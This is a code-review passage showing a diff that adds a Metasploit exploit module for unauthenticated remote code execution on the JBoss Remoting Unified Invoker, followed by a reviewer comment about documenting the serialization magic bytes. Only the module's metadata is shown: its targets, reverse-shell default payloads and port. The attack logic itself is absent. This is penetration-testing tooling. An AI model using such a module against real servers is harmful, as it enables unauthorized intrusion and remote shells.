modules/exploits/multi/misc/jboss_remoting_unified_invoker_rce.rb

```diff
@@ -0,0 +1,120 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'JBOSS EAP/AS Remoting Unified Invoker RCE',
+        'Description' => %q{
+          An unauthenticated attacker with network access to the JBOSS
+          EAP/AS <= 6.x Remoting Unified Invoker interface can send a
+          serialized object to the interface to execute code on vulnerable hosts.
+        },
+        'Author' => [
+          'Joao Matos <@joaomatosf>',         # Discovery
+          'Marcio Almeida <@marcioalm>',      # PoC
+          'Heyder Andrade <@HeyderAndrade>'   # msf module
+        ],
+        'References' => [
+          [ 'URL', 'https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf']
+        ],
+        'DisclosureDate' => '2019-12-11',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      Opt::RPORT(4446)
+    ])
+  end
+
```

Comment:
```suggestion

  # MAGIC BYTES JAVA SERIALIZATION HEADER
```
Though it may be more intuitive, to maintain parity with the comment below it might be nice to briefly describe this data as well.